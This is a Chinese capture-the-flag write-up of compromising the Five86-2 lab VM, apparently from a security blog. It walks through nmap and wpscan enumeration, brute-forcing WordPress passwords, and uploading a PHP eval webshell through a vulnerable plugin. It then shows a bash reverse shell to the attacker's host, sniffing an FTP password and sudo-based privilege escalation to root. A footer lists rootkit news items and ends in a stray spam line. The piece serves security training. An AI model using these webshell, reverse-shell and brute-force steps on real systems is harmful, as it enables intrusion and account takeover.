<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Five86-2靶機滲透記錄

    一顆小胡椒2022-03-18 13:54:23

    聲明

    由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,雷神眾測及文章作者不為此承擔任何責任。

    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。

    靶機信息

    靶機下載地址:https://www.five86.com/five86-2.html

    網絡連接:NAT

    信息搜集

    下載好靶機解壓后,直接運行文件夾里的.ova文件即可

    將靶機設置為NAT模式后,kali和靶機為同一網段

    使用nmap掃描同網段的信息,篩選出目標ip地址

    nmap -sn 192.168.74.0/24
    

    對目標主機做進一步的掃描

    nmap -A 192.168.74.137
    

    先查看80端口,訪問站點發現加載很慢,顯示也有些問題

    把目標ip和想要設置的域名寫到hosts文件里

    再次訪問恢復正常

    站點是wordpress,使用wpscan掃描下

    wpscan --url http://192.168.74.137
    

    沒發現什么信息,通過版本5.1.4也沒有找到相關的漏洞

    手工枚舉了下用戶,發現了admin賬戶

    用wpscan枚舉用戶,枚舉出5個用戶

    wpscan --url http://192.168.74.137 -eu
    

    把用戶名寫到一個文本中,用來暴破

    由于kali自帶的字典太大了,這里導出前3萬行用來當字典

    cd /usr/share/wordlistshead -30000 rockyou.txt > 3w.txt
    

    使用wpscan暴破,得到兩個賬戶的信息,-U為暴破用戶名的字典,-P為暴破密碼的字典

    barney/spooky1,stephen/apollo1

    wpscan --url http://192.168.74.137 -U user.txt -P 3w.txt
    

    嘗試登錄wordpress后臺

    登錄到stephen賬戶,發現沒什么內容,沒有主題插件什么的

    登錄barney賬戶,發現有3個插件

    分別搜索了下插件名稱,發現第三個插件IEAC有曝出過漏洞

    含有漏洞的插件版本4.2995這里也是符合的

    漏洞利用

    在kali上先創建一個文件夾

    在文件夾中創建一個php文件和html文件

    php文件里寫入一句話,html可以隨意發揮

    然后將文件夾壓縮

    mkdir testvim 1.phpvim 1.htmltestzip -r test.zip test/
    

    回到wordpress后臺,在Posts--->Add New,點擊+號,選擇e-Learing,點擊UPLOAD

    再點擊CHOOSE YOUR ZIP FILE選擇剛才做好的壓縮包,然后點擊旁邊的UPLOAD

    然后訪問

    http://192.168.74.137/wp-content/uploads/articulate_uploads/test/1.html

    url后面的內容需要根據自己壓縮包中文件夾的名稱進行更改,能訪問到即可

    然后使用蟻劍連接上傳的php一句話

    http://192.168.74.137/wp-content/uploads/articulate_uploads/test/1.php

    發現沒什么操作權限,彈個shell到kali上

    把原來上傳的php文件稍微修改下

    @eval($_POST['666']);system("bash -c 'bash -i >& /dev/tcp/192.168.74.129/666 0>&1'")?>
    

    然后kali上監聽666端口,訪問php文件路徑,連接成功

    http://192.168.74.137/wp-content/uploads/articulate_uploads/test/1.php

    獲取交互式shell,這里提示需要用python3

    python3 -c 'import pty;pty.spawn("/bin/sh")'
    

    執行sudo -l提示需要密碼,看了看別的也沒什么能利用的,切換到另外兩個賬戶看下

    只能登錄到stephen賬戶,看了下還是沒什么東西

    掃描的時候還發現了ftp服務,查了下ftp相關的進程,發現都屬于paul用戶

    這些進程看起來像定時任務腳本之類的,可能會定時執行

    ftp同http,telnet都是明文傳輸,可以嘗試抓下包,先查看網卡信息,ifconfig用不了,換成ip add命令

    veth是虛擬網卡,br可能是橋接網卡,veth的master是br,類似冗余鏈路的主備關系

    那就抓是master的這個br網卡,使用tcpdump

    -D查看可監聽網卡,timeout抓包時間(單位:秒),-w生成文件,-i選擇網卡,-r讀取pcap包

    (如果一直抓不到包的話,可以重啟下靶機)

    tcpdump -Dtimeout 120 tcpdump -w 14.pcap -i br-eca3858d86bftcpdump -r 14.pcap
    

    為了看的方便點,把pcap的內容復制出來進行分析

    找到一個密碼esomepasswford

    權限提升

    使用找到的密碼登錄到paul賬戶

    發現可以免密執行peter用戶的service命令

    sudo -l
    

    使用service命令進行提權,登錄到了peter用戶

    輸/bin/bash會報錯,因為不知道具體的路徑,這里需要使用相對路徑

    sudo -u peter service ../../bin/bash
    

    再次sudo -l發現可以免密執行root的passwd命令

    更改root賬戶的密碼后,使用新密碼登錄到root賬戶

    sudo -u root passwd rootNew password:123456
    

    在root目錄下找到flag

    RECRUITMENT

    root
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    近期,火絨威脅情報系統監測到一種Rootkit病毒正通過“天龍八部”游戲私服進行傳播。該病毒通過劫持用戶訪問的網頁來推廣自己的私服網站,并且具有廣告推廣功能。此外,其還采用多種對抗手段來對抗殺毒軟件查殺,對用戶構成較大威脅。目前,火絨安全產品可對上述病毒進行攔截查殺,請用戶及時更新病毒庫以進行防御。
    Rootkit 是植入操作系統最深處的c。盡管在紙面上它們似乎對攻擊者很有吸引力,但創建它們會帶來重大的技術挑戰,并且最輕微的編程錯誤都有可能使受害計算機完全崩潰。
    此執行鏈的目標是在每次啟動時從受感染的UEFI組件開始將內核級植入部署到Windows系統中。研究人員指出,這一特定活動似乎高度針對中國的特定個人,在伊朗和越南也出現了一些案例。
    Rootkit」即「root kit」,直譯為中文便是「根權限工具包」的意思,在今天的語境下更多指的是一種被作為驅動程序、加載到操作系統內核中的惡意軟件。
    一個可能的中國 rootkit 會感染目標計算機并在重新安裝系統時保持活動狀態
    執行下列系統命令移除 pkexec 的 suid位:chmod 0755 /usr/bin/pkexec. yum clean all && yum makecacheyum update polkit -y
    據 securityaffairs 12月30日消息,某個首次發現的 rootkit 病毒(也稱為 iLOBleed)正針對惠普企業服務器展開攻擊,能夠從遠程感染設施并擦除數據。 集成燈控(iLO)是惠普旗下的嵌入式服務器管理技術,該模塊可以完全訪問服務器上安裝的所有固件、硬件、軟件和操作系統。
    近日研究人員首次發現 rootkit 病毒(也稱為 iLOBleed)正針對惠普企業服務器展開攻擊,能夠從遠程感染設施并擦除數據。此次攻擊由伊朗網絡安全公司 Amnpardaz 發現,iLOBleed 是有史以來首次針對 iLO 固件的惡意軟件。 專家解釋說,針對 iLO 的惡意軟件非常難以防控,因為它以高權限運行(高于操作系統中的任何訪問級別),可以做到不被管理員和檢測軟件察覺。通過篡改此模塊
    安全公司 Bitdefender 的研究人員發現,一種流量重定向 Rootkit 惡意程序以某種方式通過了驅動程序認證程序, 獲得了微軟簽發的數字簽名證書。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类